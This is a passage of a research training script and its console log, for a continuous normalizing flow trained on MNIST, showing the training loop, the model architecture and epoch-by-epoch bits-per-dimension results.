1\n time_epoch_meter.set(checkpt['epoch_time_avg'])\n time_meter.set(checkpt['time_train'])\n loss_meter.set(checkpt['loss_train'])\n nll_meter.set(checkpt['bits_per_dim_train'])\n xent_meter.set(checkpt['xent_train'])\n error_meter.set(checkpt['error_train'])\n steps_meter.set(checkpt['nfe_train'])\n grad_meter.set(checkpt['grad_train'])\n tt_meter.set(checkpt['total_time_train'])\n\n if torch.cuda.is_available():\n model = torch.nn.DataParallel(model).cuda()\n\n # For visualization.\n if args.conditional:\n fixed_y = torch.from_numpy(np.arange(model.module.y_class)).repeat(model.module.y_class).type(torch.long).to(device, non_blocking=True)\n fixed_y_onehot = thops.onehot(fixed_y, num_classes=model.module.y_class)\n with torch.no_grad():\n mean, logs = model.module._prior(fixed_y_onehot)\n fixed_z = modules.GaussianDiag.sample(mean, logs)\n else:\n fixed_z = cvt(torch.randn(100, *data_shape))\n \n\n if args.spectral_norm and not args.resume: spectral_norm_power_iteration(model, 500)\n\n best_loss_nll = float(\"inf\")\n best_error_score = float(\"inf\")\n \n for epoch in range(args.begin_epoch, args.num_epochs + 1):\n start_epoch = time.time()\n model.train()\n train_loader = get_train_loader(train_set, epoch)\n for _, (x, y) in enumerate(train_loader):\n start = time.time()\n update_lr(optimizer, itr)\n optimizer.zero_grad()\n\n if not args.conv:\n x = x.view(x.shape[0], -1)\n\n # cast data and move to device\n x = cvt(x)\n \n # compute loss\n if args.conditional:\n loss_nll, loss_xent, y_predicted = compute_bits_per_dim_conditional(x, y, model)\n if args.train_mode == \"semisup\":\n loss = loss_nll + args.weight_y * loss_xent\n elif args.train_mode == \"sup\":\n loss = loss_xent\n elif args.train_mode == \"unsup\":\n loss = loss_nll\n else:\n raise ValueError('Choose supported train_mode: semisup, sup, unsup')\n error_score = 1. 
- np.mean(y_predicted.astype(int) == y.numpy()) \n \n else:\n loss = compute_bits_per_dim(x, model)\n loss_nll, loss_xent, error_score = loss, 0., 0.\n \n if regularization_coeffs:\n reg_states = get_regularization(model, regularization_coeffs)\n reg_loss = sum(\n reg_state * coeff for reg_state, coeff in zip(reg_states, regularization_coeffs) if coeff != 0\n )\n loss = loss + reg_loss\n total_time = count_total_time(model)\n loss = loss + total_time * args.time_penalty\n\n loss.backward()\n grad_norm = torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)\n\n optimizer.step()\n\n if args.spectral_norm: spectral_norm_power_iteration(model, args.spectral_norm_niter)\n \n time_meter.update(time.time() - start)\n loss_meter.update(loss.item())\n nll_meter.update(loss_nll.item())\n if args.conditional:\n xent_meter.update(loss_xent.item())\n else:\n xent_meter.update(loss_xent)\n error_meter.update(error_score)\n steps_meter.update(count_nfe(model))\n grad_meter.update(grad_norm)\n tt_meter.update(total_time)\n \n # write to tensorboard\n writer.add_scalars('time', {'train_iter': time_meter.val}, itr)\n writer.add_scalars('loss', {'train_iter': loss_meter.val}, itr)\n writer.add_scalars('bits_per_dim', {'train_iter': nll_meter.val}, itr)\n writer.add_scalars('xent', {'train_iter': xent_meter.val}, itr)\n writer.add_scalars('error', {'train_iter': error_meter.val}, itr)\n writer.add_scalars('nfe', {'train_iter': steps_meter.val}, itr)\n writer.add_scalars('grad', {'train_iter': grad_meter.val}, itr)\n writer.add_scalars('total_time', {'train_iter': tt_meter.val}, itr)\n\n if itr % args.log_freq == 0:\n log_message = (\n \"Iter {:04d} | Time {:.4f}({:.4f}) | Bit/dim {:.4f}({:.4f}) | Xent {:.4f}({:.4f}) | Loss {:.4f}({:.4f}) | Error {:.4f}({:.4f}) \"\n \"Steps {:.0f}({:.2f}) | Grad Norm {:.4f}({:.4f}) | Total Time {:.2f}({:.2f})\".format(\n itr, time_meter.val, time_meter.avg, nll_meter.val, nll_meter.avg, xent_meter.val, xent_meter.avg, loss_meter.val, loss_meter.avg, error_meter.val, error_meter.avg, steps_meter.val, steps_meter.avg, grad_meter.val, grad_meter.avg, tt_meter.val, tt_meter.avg\n )\n )\n if regularization_coeffs:\n log_message = append_regularization_to_log(log_message, regularization_fns, reg_states)\n logger.info(log_message)\n writer.add_text('info', log_message, itr)\n\n itr += 1\n \n # compute test loss\n model.eval()\n if epoch % args.val_freq == 0:\n with torch.no_grad():\n # write to tensorboard\n writer.add_scalars('time', {'train_epoch': time_meter.avg}, epoch)\n writer.add_scalars('loss', {'train_epoch': loss_meter.avg}, epoch)\n writer.add_scalars('bits_per_dim', {'train_epoch': nll_meter.avg}, epoch)\n writer.add_scalars('xent', {'train_epoch': xent_meter.avg}, epoch)\n writer.add_scalars('error', {'train_epoch': error_meter.avg}, epoch)\n writer.add_scalars('nfe', {'train_epoch': steps_meter.avg}, epoch)\n writer.add_scalars('grad', {'train_epoch': grad_meter.avg}, epoch)\n writer.add_scalars('total_time', {'train_epoch': tt_meter.avg}, epoch)\n \n start = time.time()\n logger.info(\"validating...\")\n writer.add_text('info', \"validating...\", epoch)\n losses_nll = []; losses_xent = []; losses = []\n total_correct = 0\n \n for (x, y) in test_loader:\n if not args.conv:\n x = x.view(x.shape[0], -1)\n x = cvt(x)\n if args.conditional:\n loss_nll, loss_xent, y_predicted = compute_bits_per_dim_conditional(x, y, model)\n if args.train_mode == \"semisup\":\n loss = loss_nll + args.weight_y * loss_xent\n elif args.train_mode == \"sup\":\n loss = 
loss_xent\n elif args.train_mode == \"unsup\":\n loss = loss_nll\n else:\n raise ValueError('Choose supported train_mode: semisup, sup, unsup')\n total_correct += np.sum(y_predicted.astype(int) == y.numpy())\n else:\n loss = compute_bits_per_dim(x, model)\n loss_nll, loss_xent = loss, 0.\n losses_nll.append(loss_nll.cpu().numpy()); losses.append(loss.cpu().numpy())\n if args.conditional: \n losses_xent.append(loss_xent.cpu().numpy())\n else:\n losses_xent.append(loss_xent)\n \n loss_nll = np.mean(losses_nll); loss_xent = np.mean(losses_xent); loss = np.mean(losses)\n error_score = 1. - total_correct / len(test_loader.dataset)\n time_epoch_meter.update(time.time() - start_epoch)\n \n # write to tensorboard\n test_time_spent = time.time() - start\n writer.add_scalars('time', {'validation': test_time_spent}, epoch)\n writer.add_scalars('epoch_time', {'validation': time_epoch_meter.val}, epoch)\n writer.add_scalars('bits_per_dim', {'validation': loss_nll}, epoch)\n writer.add_scalars('xent', {'validation': loss_xent}, epoch)\n writer.add_scalars('loss', {'validation': loss}, epoch)\n writer.add_scalars('error', {'validation': error_score}, epoch)\n \n log_message = \"Epoch {:04d} | Time {:.4f}, Epoch Time {:.4f}({:.4f}), Bit/dim {:.4f}(best: {:.4f}), Xent {:.4f}, Loss {:.4f}, Error {:.4f}(best: {:.4f})\".format(epoch, time.time() - start, time_epoch_meter.val, time_epoch_meter.avg, loss_nll, best_loss_nll, loss_xent, loss, error_score, best_error_score)\n logger.info(log_message)\n writer.add_text('info', log_message, epoch)\n \n for name, param in model.named_parameters():\n writer.add_histogram(name, param.clone().cpu().data.numpy(), epoch)\n \n \n utils.makedirs(args.save)\n torch.save({\n \"args\": args,\n \"state_dict\": model.module.state_dict() if torch.cuda.is_available() else model.state_dict(),\n \"optim_state_dict\": optimizer.state_dict(),\n \"epoch\": epoch,\n \"iter\": itr-1,\n \"error\": error_score,\n \"loss\": loss,\n \"xent\": loss_xent,\n \"bits_per_dim\": loss_nll,\n \"best_bits_per_dim\": best_loss_nll,\n \"best_error_score\": best_error_score,\n \"epoch_time\": time_epoch_meter.val,\n \"epoch_time_avg\": time_epoch_meter.avg,\n \"time\": test_time_spent,\n \"error_train\": error_meter.avg,\n \"loss_train\": loss_meter.avg,\n \"xent_train\": xent_meter.avg,\n \"bits_per_dim_train\": nll_meter.avg,\n \"total_time_train\": tt_meter.avg,\n \"time_train\": time_meter.avg,\n \"nfe_train\": steps_meter.avg,\n \"grad_train\": grad_meter.avg,\n }, os.path.join(args.save, \"epoch_%i_checkpt.pth\"%epoch))\n \n torch.save({\n \"args\": args,\n \"state_dict\": model.module.state_dict() if torch.cuda.is_available() else model.state_dict(),\n \"optim_state_dict\": optimizer.state_dict(),\n \"epoch\": epoch,\n \"iter\": itr-1,\n \"error\": error_score,\n \"loss\": loss,\n \"xent\": loss_xent,\n \"bits_per_dim\": loss_nll,\n \"best_bits_per_dim\": best_loss_nll,\n \"best_error_score\": best_error_score,\n \"epoch_time\": time_epoch_meter.val,\n \"epoch_time_avg\": time_epoch_meter.avg,\n \"time\": test_time_spent,\n \"error_train\": error_meter.avg,\n \"loss_train\": loss_meter.avg,\n \"xent_train\": xent_meter.avg,\n \"bits_per_dim_train\": nll_meter.avg,\n \"total_time_train\": tt_meter.avg,\n \"time_train\": time_meter.avg,\n \"nfe_train\": steps_meter.avg,\n \"grad_train\": grad_meter.avg,\n }, os.path.join(args.save, \"current_checkpt.pth\"))\n \n if loss_nll < best_loss_nll:\n best_loss_nll = loss_nll\n utils.makedirs(args.save)\n torch.save({\n \"args\": args,\n \"state_dict\": 
model.module.state_dict() if torch.cuda.is_available() else model.state_dict(),\n \"optim_state_dict\": optimizer.state_dict(),\n \"epoch\": epoch,\n \"iter\": itr-1,\n \"error\": error_score,\n \"loss\": loss,\n \"xent\": loss_xent,\n \"bits_per_dim\": loss_nll,\n \"best_bits_per_dim\": best_loss_nll,\n \"best_error_score\": best_error_score,\n \"epoch_time\": time_epoch_meter.val,\n \"epoch_time_avg\": time_epoch_meter.avg,\n \"time\": test_time_spent,\n \"error_train\": error_meter.avg,\n \"loss_train\": loss_meter.avg,\n \"xent_train\": xent_meter.avg,\n \"bits_per_dim_train\": nll_meter.avg,\n \"total_time_train\": tt_meter.avg,\n \"time_train\": time_meter.avg,\n \"nfe_train\": steps_meter.avg,\n \"grad_train\": grad_meter.avg,\n }, os.path.join(args.save, \"best_nll_checkpt.pth\"))\n \n if args.conditional:\n if error_score < best_error_score:\n best_error_score = error_score\n utils.makedirs(args.save)\n torch.save({\n \"args\": args,\n \"state_dict\": model.module.state_dict() if torch.cuda.is_available() else model.state_dict(),\n \"optim_state_dict\": optimizer.state_dict(),\n \"epoch\": epoch,\n \"iter\": itr-1,\n \"error\": error_score,\n \"loss\": loss,\n \"xent\": loss_xent,\n \"bits_per_dim\": loss_nll,\n \"best_bits_per_dim\": best_loss_nll,\n \"best_error_score\": best_error_score,\n \"epoch_time\": time_epoch_meter.val,\n \"epoch_time_avg\": time_epoch_meter.avg,\n \"time\": test_time_spent,\n \"error_train\": error_meter.avg,\n \"loss_train\": loss_meter.avg,\n \"xent_train\": xent_meter.avg,\n \"bits_per_dim_train\": nll_meter.avg,\n \"total_time_train\": tt_meter.avg,\n \"time_train\": time_meter.avg,\n \"nfe_train\": steps_meter.avg,\n \"grad_train\": grad_meter.avg,\n }, os.path.join(args.save, \"best_error_checkpt.pth\"))\n \n\n # visualize samples and density\n with torch.no_grad():\n fig_filename = os.path.join(args.save, \"figs\", \"{:04d}.jpg\".format(epoch))\n utils.makedirs(os.path.dirname(fig_filename))\n generated_samples = model(fixed_z, reverse=True).view(-1, *data_shape)\n save_image(generated_samples, fig_filename, nrow=10)\n writer.add_images('generated_images', generated_samples.repeat(1,3,1,1), epoch)\n\nNamespace(JFrobint=None, JdiagFrobint=None, JoffdiagFrobint=None, add_noise=True, alpha=1e-06, atol=0.0001, autoencode=False, batch_norm=False, batch_size=8000, batch_size_schedule='', begin_epoch=1, conditional=False, controlled_tol=True, conv=True, data='mnist', dims='64,64,64', divergence_fn='approximate', dl2int=None, imagesize=None, l1int=None, l2int=None, layer_type='concat', log_freq=1, lr=0.0001, max_grad_norm=10000000000.0, multiscale=True, nonlinearity='softplus', num_blocks=2, num_epochs=1000, parallel=False, rademacher=True, residual=False, resume='../experiments_published/cnf_published_bs8K_errcontrol_7gpus_adaptive_1/epoch_400_checkpt.pth', rtol=0.0001, save='../experiments_published/cnf_published_bs8K_errcontrol_7gpus_adaptive_1', seed=0, solver='dopri5', spectral_norm=False, spectral_norm_niter=10, step_size=None, strides='1,1,1,1', test_atol=None, test_batch_size=5000, test_rtol=None, test_solver=None, time_length=1.0, time_penalty=0, train_T=True, train_mode='semisup', val_freq=1, warmup_iters=113.0, weight_decay=0.0, weight_y=0.5)\nODENVP(\n (transforms): ModuleList(\n (0): StackedCNFLayers(\n (chain): ModuleList(\n (0): LogitTransform()\n (1): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(2, 64, kernel_size=(3, 3), stride=(1, 1), 
padding=(1, 1))\n )\n (1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 1, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n (2): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(2, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 1, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n (3): SqueezeLayer()\n (4): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(5, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 4, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n (5): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(5, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 4, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n )\n )\n (1): StackedCNFLayers(\n (chain): ModuleList(\n (0): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(3, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 2, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n (1): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(3, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n 
(1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 2, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n (2): SqueezeLayer()\n (3): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(9, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 8, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n (4): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(9, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 8, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n )\n )\n (2): StackedCNFLayers(\n (chain): ModuleList(\n (0): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(5, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 4, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n (1): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(5, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 4, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n )\n )\n )\n (project_ycond): LinearZeros(in_features=10, out_features=1568, bias=True)\n (project_class): LinearZeros(in_features=784, out_features=10, bias=True)\n)\nNumber of trainable parameters: 828890\n===> Using batch size 8000. 
Total 7 iterations/epoch.
/tancode/repos/tan-ffjord/lib/layers/odefunc.py:286: UserWarning: To copy construct from a tensor, it is recommended to use sourceTensor.clone().detach() or sourceTensor.clone().detach().requires_grad_(True), rather than torch.tensor(sourceTensor).
  t = torch.tensor(t).type_as(y)
Iter 4777 | Time 79.9624(41.4948) | Bit/dim 1.0868(1.1031) | Xent 0.0000(0.0000) | Loss 1.0868(1.1031) | Error 0.0000(0.0000) Steps 440(439.16) | Grad Norm 5.3272(5.4877) | Total Time 10.00(10.00)
[... training log for Epochs 0401-0437 elided: each epoch prints a "===> Using batch size 8000. Total 7 iterations/epoch." header, seven Iter lines, "validating...", and a validation summary; validation Bit/dim improved from 1.0801 (Epoch 0401) through 1.0737 (Epoch 0410) and 1.0723 (Epoch 0420) to a best of 1.0719 (Epoch 0428), with Xent 0.0000 and Error 1.0000 at every check; over Iter 4778-5041 the running Bit/dim mean fell from 1.1031 to 1.0773 and the running Grad Norm mean from 5.49 to 0.08, with Steps near 440 throughout ...]
Iter 5042 | Time 39.3258(40.3380) | Bit/dim 1.0786(1.0773) | Xent 0.0000(0.0000) | Loss 1.0786(1.0773) | Error 0.0000(0.0000) Steps 440(441.93) | Grad Norm 0.1136(0.0832) | Total Time 10.00(10.00)
validating...
Epoch 0438 | Time 14.7963, Epoch Time 308.9398(310.2179), Bit/dim 1.0721(best: 1.0719), Xent 0.0000, Loss 1.0721, Error 1.0000(best: inf)
Total 7 iterations/epoch.\nIter 5043 | Time 40.4211(40.3404) | Bit/dim 1.0788(1.0773) | Xent 0.0000(0.0000) | Loss 1.0788(1.0773) | Error 0.0000(0.0000) Steps 446(442.05) | Grad Norm 0.0645(0.0827) | Total Time 10.00(10.00)\nIter 5044 | Time 39.5492(40.3167) | Bit/dim 1.0730(1.0772) | Xent 0.0000(0.0000) | Loss 1.0730(1.0772) | Error 0.0000(0.0000) Steps 440(441.99) | Grad Norm 0.0595(0.0820) | Total Time 10.00(10.00)\nIter 5045 | Time 39.9685(40.3063) | Bit/dim 1.0748(1.0771) | Xent 0.0000(0.0000) | Loss 1.0748(1.0771) | Error 0.0000(0.0000) Steps 440(441.93) | Grad Norm 0.0688(0.0816) | Total Time 10.00(10.00)\nIter 5046 | Time 39.6875(40.2877) | Bit/dim 1.0822(1.0773) | Xent 0.0000(0.0000) | Loss 1.0822(1.0773) | Error 0.0000(0.0000) Steps 446(442.06) | Grad Norm 0.0655(0.0811) | Total Time 10.00(10.00)\nIter 5047 | Time 39.7585(40.2718) | Bit/dim 1.0799(1.0774) | Xent 0.0000(0.0000) | Loss 1.0799(1.0774) | Error 0.0000(0.0000) Steps 440(441.99) | Grad Norm 0.0768(0.0810) | Total Time 10.00(10.00)\nIter 5048 | Time 40.3894(40.2753) | Bit/dim 1.0739(1.0773) | Xent 0.0000(0.0000) | Loss 1.0739(1.0773) | Error 0.0000(0.0000) Steps 440(441.93) | Grad Norm 0.0585(0.0803) | Total Time 10.00(10.00)\nIter 5049 | Time 40.2821(40.2756) | Bit/dim 1.0777(1.0773) | Xent 0.0000(0.0000) | Loss 1.0777(1.0773) | Error 0.0000(0.0000) Steps 440(441.88) | Grad Norm 0.0847(0.0804) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0439 | Time 14.9688, Epoch Time 307.8355(310.1465), Bit/dim 1.0719(best: 1.0719), Xent 0.0000, Loss 1.0719, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5050 | Time 39.2756(40.2456) | Bit/dim 1.0772(1.0773) | Xent 0.0000(0.0000) | Loss 1.0772(1.0773) | Error 0.0000(0.0000) Steps 446(442.00) | Grad Norm 0.0615(0.0799) | Total Time 10.00(10.00)\nIter 5051 | Time 39.8175(40.2327) | Bit/dim 1.0757(1.0772) | Xent 0.0000(0.0000) | Loss 1.0757(1.0772) | Error 0.0000(0.0000) Steps 440(441.94) | Grad Norm 0.0688(0.0795) | Total Time 10.00(10.00)\nIter 5052 | Time 41.8110(40.2801) | Bit/dim 1.0787(1.0773) | Xent 0.0000(0.0000) | Loss 1.0787(1.0773) | Error 0.0000(0.0000) Steps 440(441.88) | Grad Norm 0.0694(0.0792) | Total Time 10.00(10.00)\nIter 5053 | Time 40.8224(40.2963) | Bit/dim 1.0765(1.0772) | Xent 0.0000(0.0000) | Loss 1.0765(1.0772) | Error 0.0000(0.0000) Steps 440(441.82) | Grad Norm 0.0736(0.0791) | Total Time 10.00(10.00)\nIter 5054 | Time 40.2548(40.2951) | Bit/dim 1.0756(1.0772) | Xent 0.0000(0.0000) | Loss 1.0756(1.0772) | Error 0.0000(0.0000) Steps 440(441.77) | Grad Norm 0.0655(0.0786) | Total Time 10.00(10.00)\nIter 5055 | Time 40.3210(40.2959) | Bit/dim 1.0784(1.0772) | Xent 0.0000(0.0000) | Loss 1.0784(1.0772) | Error 0.0000(0.0000) Steps 440(441.72) | Grad Norm 0.0966(0.0792) | Total Time 10.00(10.00)\nIter 5056 | Time 38.9042(40.2541) | Bit/dim 1.0775(1.0772) | Xent 0.0000(0.0000) | Loss 1.0775(1.0772) | Error 0.0000(0.0000) Steps 440(441.67) | Grad Norm 0.0977(0.0797) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0440 | Time 14.9726, Epoch Time 308.6790(310.1024), Bit/dim 1.0716(best: 1.0719), Xent 0.0000, Loss 1.0716, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5057 | Time 39.5420(40.2327) | Bit/dim 1.0732(1.0771) | Xent 0.0000(0.0000) | Loss 1.0732(1.0771) | Error 0.0000(0.0000) Steps 446(441.80) | Grad Norm 0.0828(0.0798) | Total Time 10.00(10.00)\nIter 5058 | Time 38.9610(40.1946) | Bit/dim 1.0758(1.0771) | Xent 0.0000(0.0000) | Loss 1.0758(1.0771) | Error 0.0000(0.0000) Steps 440(441.74) | Grad Norm 0.1000(0.0804) | Total Time 10.00(10.00)\nIter 5059 | Time 41.8792(40.2451) | Bit/dim 1.0835(1.0773) | Xent 0.0000(0.0000) | Loss 1.0835(1.0773) | Error 0.0000(0.0000) Steps 446(441.87) | Grad Norm 0.0772(0.0803) | Total Time 10.00(10.00)\nIter 5060 | Time 39.0249(40.2085) | Bit/dim 1.0778(1.0773) | Xent 0.0000(0.0000) | Loss 1.0778(1.0773) | Error 0.0000(0.0000) Steps 440(441.81) | Grad Norm 0.0989(0.0809) | Total Time 10.00(10.00)\nIter 5061 | Time 40.3024(40.2113) | Bit/dim 1.0738(1.0772) | Xent 0.0000(0.0000) | Loss 1.0738(1.0772) | Error 0.0000(0.0000) Steps 440(441.76) | Grad Norm 0.0728(0.0807) | Total Time 10.00(10.00)\nIter 5062 | Time 40.4513(40.2185) | Bit/dim 1.0754(1.0771) | Xent 0.0000(0.0000) | Loss 1.0754(1.0771) | Error 0.0000(0.0000) Steps 446(441.89) | Grad Norm 0.0566(0.0799) | Total Time 10.00(10.00)\nIter 5063 | Time 39.5264(40.1978) | Bit/dim 1.0788(1.0772) | Xent 0.0000(0.0000) | Loss 1.0788(1.0772) | Error 0.0000(0.0000) Steps 440(441.83) | Grad Norm 0.0690(0.0796) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0441 | Time 14.9985, Epoch Time 307.2936(310.0182), Bit/dim 1.0715(best: 1.0716), Xent 0.0000, Loss 1.0715, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5064 | Time 40.3287(40.2017) | Bit/dim 1.0829(1.0774) | Xent 0.0000(0.0000) | Loss 1.0829(1.0774) | Error 0.0000(0.0000) Steps 446(441.95) | Grad Norm 0.0663(0.0792) | Total Time 10.00(10.00)\nIter 5065 | Time 40.7226(40.2173) | Bit/dim 1.0784(1.0774) | Xent 0.0000(0.0000) | Loss 1.0784(1.0774) | Error 0.0000(0.0000) Steps 440(441.90) | Grad Norm 0.0663(0.0788) | Total Time 10.00(10.00)\nIter 5066 | Time 39.0119(40.1812) | Bit/dim 1.0798(1.0775) | Xent 0.0000(0.0000) | Loss 1.0798(1.0775) | Error 0.0000(0.0000) Steps 440(441.84) | Grad Norm 0.0713(0.0786) | Total Time 10.00(10.00)\nIter 5067 | Time 41.0093(40.2060) | Bit/dim 1.0716(1.0773) | Xent 0.0000(0.0000) | Loss 1.0716(1.0773) | Error 0.0000(0.0000) Steps 440(441.78) | Grad Norm 0.0552(0.0779) | Total Time 10.00(10.00)\nIter 5068 | Time 40.3178(40.2094) | Bit/dim 1.0725(1.0771) | Xent 0.0000(0.0000) | Loss 1.0725(1.0771) | Error 0.0000(0.0000) Steps 440(441.73) | Grad Norm 0.0703(0.0777) | Total Time 